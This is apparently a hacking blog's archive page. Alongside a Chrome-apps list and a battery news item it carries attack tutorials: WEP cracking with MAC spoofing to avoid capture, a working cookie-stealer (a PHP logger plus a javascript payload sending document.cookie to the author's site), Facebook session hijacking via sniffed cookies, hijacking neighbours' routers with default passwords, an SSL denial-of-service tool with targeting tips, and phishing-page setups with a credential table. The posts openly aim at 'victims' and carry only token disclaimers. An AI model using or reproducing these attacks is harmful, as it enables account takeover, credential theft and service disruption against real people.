Showing posts with label FACEBOOK HACKED. Show all posts
Showing posts with label FACEBOOK HACKED. Show all posts

Top 5 Google Chrome Apps For Bloggers Must Check


Are you using a chrome browser for blogging  ? If yes then why can't you add Chrome apps which would make your blogging more fast,easy and fun. Here on this post i would like to share some top chrome apps that a blogger must have .

         A blogger must check out this awesome app which is the easiest way to update your blog .It is a full featured blog editor that integrated with your browser.You can create new posts,labels and even edit old blogs posts.It have simple and clean interface and more tools available.Both compose mode and HTML mode is enabled.
One highlisht is No need of Registration.

This app helps you to check how your blog views in various resolution .It resize entire browser to desktop,netbook,mobile and more resolution. This helps you to develop your blogger template .

 Best tool for web development.Allows inspect,edit and monitor CSS ,HTML codes, even if you don't know these languages.Found any white spaces in your blog ? You can fix with Firebug.Firebug can be used to reduce space in your blog.

This is one of the top chrome app for edit images which is layer base one.Pixlr is browser integrated app.No need of download,registeration, simple interface and not at all annoying.The editor is capable to reproduce PSD files.

It create screen shots of web pages , edit or annotate them and save into youcomputer at any formats.You can even export ito blogger ,email it and print out it.
Simple and Clean interface.

Technology Updates!

Imagine wrapping paper that could be a gift in and of itself because it lights up with words like "Happy Birthday." That is one potential application of a new biodegradable battery made of cellulose, the stuff of paper.

Scientists worldwide are striving to develop thin, flexible, lightweight, inexpensive, environmentally friendly batteries made entirely from nonmetal parts. Among the most promising materials for these batteries are conducting polymers.

However, until now these have impractical for use in batteries — for instance, their ability to hold a charge often degrades over use.

Easy to make

The key to this new battery turned out to be an often bothersome green algae known as Cladophora. Rotting heaps of this hairlike freshwater plant throughout the world can lead to unsightly, foul-smelling beaches.

This algae makes an unusual kind of cellulose typified by a very large surface area, 100 times that of the cellulose found in paper. This allowed researchers to dramatically increase the amount of conducting polymer available for use in the new device, enabling it to better recharge, hold and discharge electricity.

"We have long hoped to find some sort of constructive use for the material from algae blooms and have now been shown this to be possible," said researcher Maria Strømme, a nanotechnologist at Uppsala University in Sweden. "This creates new possibilities for large-scale production of environmentally friendly, cost-effective, lightweight energy storage systems."

The new batteries consisted of extremely thin layers of conducting polymer just 40 to 50 nanometers or billionths of a meter wide coating algae cellulose fibers only 20 to 30 nanometers wide that were collected into paper sheets.

"They're very easy to make," Strømme said.

Quick to charge

They could hold 50 to 200 percent more charge than similar conducting polymer batteries, and once better optimized, they might even be competitive with commercial lithium batteries, the researchers noted. They also recharged much faster than conventional rechargeable batteries — while a regular battery takes at least an hour to recharge, the new batteries could recharge in anywhere from eight minutes to just 11 seconds.

The new battery also showed a dramatic boost in the ability to hold a charge over use. While a comparable polymer battery showed a 50 percent drop in the amount of charge it could hold after 60 cycles of discharging and recharging, the new battery showed just a 6 percent loss through 100 charging cycles.

"When you have thick polymer layers, it's hard to get all the material to recharge properly, and it turns into an insulator, so you lose capacity," said researcher Gustav Nyström, an electrochemist at Uppsala University. "When you have thin layers, you can get it fully discharged and recharged."

Flexible electronics

The researchers suggest their batteries appear well-suited for applications involving flexible electronics, such as clothing and packaging.

"We're not focused on replacing lithium ion batteries — we want to find new applications where batteries are not used today," Strømme told LiveScience. "What if you could put batteries inside wallpaper to charge sensors in your home? If you could put this into clothes, can you couple that with detectors to analyze sweat from your body to tell if there's anything wrong?"

Future directions of research include seeing how much charge these batteries lose over time, a problem with polymer batteries and all batteries in general. They also want to see how much they can scale up these batteries, "see if we can make them much, much larger," Strømme said.

The scientists detailed their last month in the journal Nano Letters.

Hacking Wifi key using Backtrack

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections. Wifi has become an integral part of our lives today.

Right from Mobile Phones to Laptops to Ipads every device now has Wifi support.
Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves, however, it has been found that WEP is not as secure as once believed. Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE
Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -
* ifconfig
This is the Linux equivalent of ipconfig, you will see the network adapters in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.
* airmon-ng
This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range
* airmon-ng stop [Wi-Fi Card name(without the quotes)]
This command will stop the cards broadcast and reception immediately
* macchanger –mac [Desired MAC address] [Wi-Fi card name]
This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later
* airmon-ng start [Wi-Fi Card name]
You will see another extra adapter that is set on monitor mode, use that adapter for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears
DUMPING PACKETS
Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -
* airodump-ng [Wi-Fi card name]
Copy and paste the BSSID in the following command and execute it
* airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.
SPEEDING UP THINGS
However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it
*airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.
REVEALING WEP KEY
Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.
aircrack-ng –n 64 –b [BSSID] [Filename without the extension] Revealing the WEP Key -
As you type this command, you will see that a key will appear in front of you in the given below format:
XX:XX:XX:XX
It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
Remember, the bit level should be a number of 2n where n:1,2,3,4…
e.g.
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
Now just login using the WEP key you got.

Reset Admin Password of Windows XP, Vista and 7

This trick enables us to change the password of Windows Operating System Using Ubuntu 9.10 distribution installed on a usb drive.   Eventhough the titile states on XP, Vista and 7, the trick you are gonna read is also for 2000 and 2003. This method is applicable when you have some Alzheimer’s disease and you forgot your most important Windows login password.  And probably you do some idiotic things with all the password possibilities you know and then your account gets locked up. So there when you stand without knowing what to do, this trick comes to the rescue.
What do you need :

1) Unetbootin
2) Ubuntu 9.10 ISO (You can also download it using Unetbootin)
3)  chntpw
4) A Usb drive (1 gb or more)
Steps :
First we need to install Ubuntu 9.10 to the USB drive..  Open Unetbootin in a computer other than the target computer (you couldn’t do it on the target computer as it is already locked or forgotten password)
Select Ubuntu 9.10 or Select the “Disc image” option and select the path where you have downloaded the ISO. Select the type as USB drive and select the drive where the usb drive is displayed. Click Ok..
Then Wait..
It installs…
When it is done, click on “exit” and remove the USB drive. Yupeee!! You now have the live image of Ubuntu 9.10
Insert the Usb drive into the target computer. Start the computer, Boot from the usb drive. If it does not come, you may have to change the boot device preferences in the BIOS.
When you boot from the USB drive , the unetbootin options comes and you have to select “default” . Thus it boots into Ubuntu OS. Now you have access to the windows filesystem. Hurray!!
Now we need the tool chntpw. To get this software, connect to the internet and run the command :
sudo software-properties-gtk --enable-component=universe--enable-component=multiverse; sudo apt-get update; sudo apt-get install chntpw
Go to the terminal and change the directory to the password file
cd /media/path/to/disk/WINDOWS/system32/config/
Now run the chntpw tool
# sudo chntpw -u username SAM SYSTEM
When it is executed, it will just erase the password. Now you could restart and log into the windows without the password.
Anyway, as a security precaution , you may backup the data  in the hard disk, what if you mess it all up?? lolz..

How to Make a Cookie Logger to Hack Anyone's Accounts (Facebook, Gmail, Yahoo etc.)


A Cookie Logger is a Script that is used to steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger…
Hope you will enjoy Reading it...

STEP 1: First you have to create a file which can capture a person's cookie.So follow the following process.
this is last step actually ↓ 

  Give this code to victim to run in his browser (notice that here site name is http://hackingdatabase786.blogspot.in/ so replace or change it with your site name)


javascript:document.location='http://hackingdatabase786.blogspot.in/cookielogger.php?ex='.concat(escape(document.cookie));
 
STEP 2: Copy the Following Script into a Notepad File and save the file as cookielogger.php  

<?php
$filename = "logfile.txt";
if (isset($_GET["ex"]))
{
if (!$handle = fopen($filename, 'a'))
{
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
{

exit;
}
}

header("Location: http://www.google.com");
fclose($handle);
exit;
}
exit;
?>
STEP 3: Create a new Notepad File and Save it as logfile.txt
    
STEP 4: Upload these files to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
If you don’t have any Website then you can use the following Website to get a Free Website which has PHP support: http://www.0fees.net/signup.php
 
STEP 5: Now your cookie logger is ready to be used. Now All You Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

Note :- Give Your Victim The Link Of GIF File…
javascript:document.location='http://hackingdatabase786.blogspot.in/cookielogger.php?ex='.concat(escape(document.cookie));
STEP 6: When the victim see the post he view the image of your link but when he will click on the image he will redirect on your given link and you will get his cookie in log.txt. The Cookie Would Look as Follows:
   
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9.
    
STEP 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before "=" is the name of the cookie and the string after "=" is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a Firefox add-on named "Cookie Manager +
STEP 8: Go to the Website whose Account you have just hacked and you will find that you are logged in as the Victim and now you can change the victim’s account information.
NOTE: Make sure that from Step 6 to 8 the Victim should be Online because you are actually hijacking the Victim’s Session so if the Victim clicks on Log-out you will also Log-out automatically.

If you have any queries or suggestions related to this post on 'How to Make a Cookie Logger to Hack Anyone's Accounts (Facebook, Gmail, Yahoo etc.)', you're most welcome in comments..! :)

Hacking Facebook Account Using Session Hijacking Attack

What Is Session Hijacking Attack ?

Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.

The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session. The intrusion may or may not be detectable, depending on the user's level of technical knowledge and the nature of the attack. If a Web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause

Step By Step Explanation Of How To Carry Out This Attack ?

First of all, you would need to connect to an unsecured wireless connection that others are using. Then we start capturing packets transferred over this network. Note that your wireless adapter needs to support monitor mode to scan all packets transferred over a network. you can check your wi-fi card specifications to see if it supports monitor mode.

We would then need to use a network sniffing tool so sniff packets transferred over the network. In this case, I am using a tool called Wireshark (Download From Here). Within wireshark, there is a menu called "Capture"; Under the capture menu, select interfaces from that menu, and a list of your interfaces will come up.


Next you select Start Next to the interface that you have enabled monitor mode on. most times it is the interface that is capturing the most packets. In my case, Microsoft interface is capturing the most packets, so i will select to start capturing with the microsoft interface. You would leave wireshark to capture packets for a couple of seconds depending on the amount of persons currently using the network. Say 30 seconds if 10 people currently are using the network, or 30 minutes if there is barely network activity going on. While capturing, wireshark will look something like this.

After capturing a certain amount of packets, or running the capture for a certain amount of time, stop it by clicking on the stop current capture button.
After stopping the capture, you will need to look for the user's facebook session cookie which, hopefully was transferred in one of the packets captured. to find this cookie, use the wireshark search which can be found by pressing "ctrl + f" on your keyboard. In this search interface, select Find: By "String"; Search In: "Packet Details". and Filter by the string "Cookie"
When you press find, if there is a cookie, this search will find it, if no cookie was captured, you will have to start back at step 2. However, if youre lucky and some cookies we're captured, when you search for cookie, your interface will come up looking like this in the diagram below. You would notice the cookie next to the arrow contains lots of data, to get the data. the next thing you do is to right click on the cookie and click copy->description.
After copying the description, paste it in a text file, and separate each variable to a new line (note the end of every variable is depicted by a semicolon eg - c_user=100002316516702;). After some research and experimenting, i figured out that facebook authenticated the user session by 2 cookies called c_user and xs. Therefore you will only need the values of these cookies, and then need to inject them into your browser. Before injecting the cookies, here is what my facebook page looked like:
The next thing you would need to do is to inject this information as your own cookie. so firstly you would need to install a cookie manager extension for your browser, I'm using firefox Advance Cookie Manager. After installing this extension, you will find it under Tools->cookie manager. The interface for cookie manager looks like this:


The first thing we would need to do is to clear all cookies, so clear all the cookies you currently have. Then select the "Add Cookie" by clicking on " + sing " to add a new cookie. The first cookie you will add is the c_user cookie which will have the following information:: Domain - ".facebook.com", name-"c_user", value-"the value you copied earlier from the wireshark scanning" and the Path-"/"; leave the isSecure , isSession and Expires On values to default:

The next thing you do is to hit the " + Sing " button and the cookie is saved. Repeat the same steps to add the xs cookie with all of the same information, except the value, which would be the xs value you have.




After adding these 2 cookies, just go to facebook.com, refresh the page and... Boom!! you will see you are logged in as that user whose cookie information you stole. Here is my facebook page after i injected those cookies:


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get up to 3 years of imprisonment, if got caught in doing so.

How to Hack Your Broadband Connection?

MANY PEOPLE ASKED ME ABOUT THE  HACKING BROADBAND!!!
There are many PC tricks to hack the other broadband connection but at this time I am giving all my reader new one PC trick. This one broadband hack method is 100% working. So give a try for this PC trick. To perform this broadband hack follows the following steps of this PC trick.
STEP 1: For this PC trick first of all you have to download any port Scanner. (for example: i prefer Super Scan,  Advance Port Scanner).

STEP 2:  Now you have to get your ip address for this broadband hack as given: Go to Command prompt type "ipconfig /all" without quotes Then hit enter. You will see your ip as a clients ip. suppose your broadband default gateway and I.P. are 172.27.103.1 & 172.27.103.190, see in below picture
    

STEP 3: Write your IP in IP scanner Software and scan for alive IPs in the below range start: 172.27.103.1 to End:172.27.103.255. see in picture below
   

STEP 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.
 
STEP 5: If port 80 is open then Enter that IP in your web browser (in my case http://172.27.103.1 will be enter), if 23 port is open then u should know how to telnet it from command prompt.
 
   
    

STEP 6: Then this broadband hack asks for USER ID and PASSWORD type
                 username =admin
                 password =admin or password
There is a high chance but not 100% that you will be able to login with that username and password. admin-admin is the default username and password that is set while manufacturing the adsl modem devices. If denied then use on another alive IP.
    
      
   

STEP 7: If you get success in this PC trick then  it will show router settings of the IP user There go to Home -&gt; Wan Setting and the username and password of his account will appear there.

STEP 8: Use Show Password tools to view the password in asterisks ********.
Now you have username and password ready for use. That’s all about this PC trick to hack your broadband connection.

  that's it... Enjoy!!!!

Recovering Passwords From Messengers

Recovering Passwords From Messengers

3/07/2011 Author Name: Wamiq Ali

We will use a small software to get passwords from messengers installed in a computer. These passwords are usually encrypted but this software will decrypt them and will show you in the form of normal text. You can also execute this in another computer to get the passwords. You can also make an autorun usb drive to acquire passwords from this software and also from browser. But for browser you have to use other application. I will post this trick later. Now just stick to this software. Its name is Messen Pass.

MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
MSN Messenger
Windows Messenger (In Windows XP)
Windows Live Messenger (In Windows XP/Vista/7)
Yahoo Messenger (Versions 5.x and 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
Trillian
Trillian Astra
Miranda
GAIM/Pidgin
MySpace IM
PaltalkScene
Digsby

Note: MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs.Also some antivirus might consider this as virus but not in most cases.

>>>Download Messen Pass
- See more at: http://www.hackersthirst.com/2011/03/recovering-passwords-from-messengers.html#sthash.aMK6YKS7.dpuf

The Hacker’s Choice releases SSL DOS Tool



______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed. This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection. Download: Windows binary: thc-ssl-dos-1.4-win-bin.zip Unix Source : thc-ssl-dos-1.4.tar.gz Use "./configure; make all install" to build. Usage: ./thc-ssl-dos 127.3.133.7 443 Handshakes 0 [0.00 h/s], 0 Conn, 0 Err Secure Renegotiation support: yes Handshakes 0 [0.00 h/s], 97 Conn, 0 Err Handshakes 68 [67.39 h/s], 97 Conn, 0 Err Handshakes 148 [79.91 h/s], 97 Conn, 0 Err Handshakes 228 [80.32 h/s], 100 Conn, 0 Err Handshakes 308 [80.62 h/s], 100 Conn, 0 Err Handshakes 390 [81.10 h/s], 100 Conn, 0 Err Handshakes 470 [80.24 h/s], 100 Conn, 0 Err Comparing flood DDoS vs. SSL-Exhaustion attack: A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server. This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack. The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS). Tips & Tricks for whitehats 1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU. 2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used. 3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, ... or the secure database port). Counter measurements: No real solutions exists. The following steps can mitigate (but not solve) the problem: 1. Disable SSL-Renegotiation 2. Invest into SSL Accelerator Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this www.blogbari.com

Phishing Facebook Hack.


Welcome to the pleasehack in a series educating you on Social Engineering awareness and techniques. Today, I'm going to show you how a saavy Social Engineer would trick a friend into unknowingly surrendering their Facebook password. My intent is to warn and demonstrate how easy it is to succumb to phishing via Social Engineering, and therefore expose yourself.

What is Phishing?

Phishing is the act of tricking someone into signing onto a fake website, which mimics a real site, such as Facebook. The phishing page will log the credentials that the user enters in the password field, and usually goes unnoticed with the right circumstances and some Social Engineering.
The phishing page is created by visiting the website you want to mock, copying the source HTML code, and then altering it to use a custom PHP script to log the victim's credentials. A good phishing page will seamlessly use cookies to bypass redirect filters. So if a cookie for the site exists, the user will be logged in and more than likely won't realize what happened.

Warnings

  • Phishing is illegal.
  • Only phish your friends who give you consent to do so.

Step 1 Get a Web Host

You need a place to host your phishing page. I like T35—they are free, and offer cPanel hosting.
  1. Make a free account on T35.
  2. Go to your email that you used and click the link confirming the account.

Step 2 Create the Phishing Page

Now we need to create the site that will log the victim's credentials.
  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Facebook login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of"action=" to "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
  7. Make a new text file, and paste this as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your T35 account and click Upload. Upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.

Step 3 Perform the Phish

In a status update on Facebook, post something like the following:
    "Check out this funny picture of me on my website xD <post link to phishing page here>."
It's really that simple. You should start to see people's login credentials getting stored in your "passwords.txt" file. Simply because it comes from a "trusted" Facebook friend, they will go with their instincts and click the link without thinking twice about it. The best part about that PHP code posted above, is the header sends you back to the Facebook homepage, bypassing the redirect filter warning that Facebook has implemented, which will make it nearly seamless to the user who fell for it.

Hack facebook password social engineering



This post was created because there is some users still confuse because they didn't see the facebook link thumbnail image while they add a link in facebook.
Since I wrote my last tutorial, facebook made some change in the way they scrap the url you provide in your update status box in your facebook profile.

Step by step how to Hack Facebook Password Social Engineering:


1. Read and understand first how to hack facebook password and how to hack facebook account from the following facebook hacking tutorials:
2. Attacker already set up the fake website page from the tutorial above. The tutorial above about facebook phishing, fake facebook page, will be useful if attacker use it on LAN, but if attacker want to hack facebook from the internet or WAN attacker need to do something to get as much passwords as possible. That's why attacker need to do some social engineering using facebook to deceive the users.
3. The next step attacker made a fake account on facebook and add other users as much as he can. When he get enough users already, he start the social engineering attack by posting fake link into his status message. Attacker know that psychologically human is a curious creature, when there's something unique or amazing they want to know more about it.
4. Here is the link that attacker put on his facebook profile status message.
Hack Facebook Password Social Engineering
you can download the script below:

Download Hack Facebook Password Social Engineering
Conclusions:
1. Do not input your username or password if facebok page suddenly ask you to input it in the middle while you browsing facebook page.
2. See the URI carefully, make sure the URI is https://www.facebook.com or https://facebook.com, not other domains.
hope it useful :-)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/hack-facebook-password-social-engineering/#sthash.viNZGWPl.dpuf

How to Hack Facebook Account Password (5 Steps)


On How to Hack Facebook phishing attack page (see here) there is a user comment from jordin71 that ask for the new facebook offline page, because the last one is the old facebook interface. So I to make the new one to update the facebook offline file.
I also want to remind you again that this tutorial How to Hack Facebook Account and the downloadable file is free to use and the purpose is for education. I’m not responsible for any misuse of this file.

Requirement:

1. Facebook offline page (download)
2. MySQL Table Query (the MySQL table for this tutorial)
--
-- Table structure for table `fb_fail`
--

CREATE TABLE IF NOT EXISTS `fb_fail` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `fb_login`
--

CREATE TABLE IF NOT EXISTS `fb_login` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `fb_login`
--

Step by Step How to Hack Facebook Account:

1. Download the facebook offline file from the link above
2. Inside the facebook.rar file there are 3 files (index.php, login.php, and view.php) you need to configure 2 of them(login.php and view.php) to fit with your server configuration.
5 Steps How to Hack Facebook Account Password
3. In this step, you can view my previous tutorial about how to hack facebook account using phishing method (see the tutorial here)
4. This is the fake facebook page interface when I open it using my browser.
5 Steps How to Hack Facebook Account Password
5. If someone logged in, we can view the harvested passwords in view.php page.
5 Steps How to Hack Facebook Account Password
Update!!:

Countermeasure:

1. See the browser address bar URL, do not continue browse if you find the URI is mistyping, only facebook.com the real one.
2. If you type your username and password correctly, but the facebook page bring you to wrong username or password page, see the browser address bar URL in case you open the fake facebook page.
Hope it useful :-)
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/5-steps-how-to-hack-facebook-account-password/#sthash.Thq5tYWy.dpuf
Subscribe to: Posts (Atom)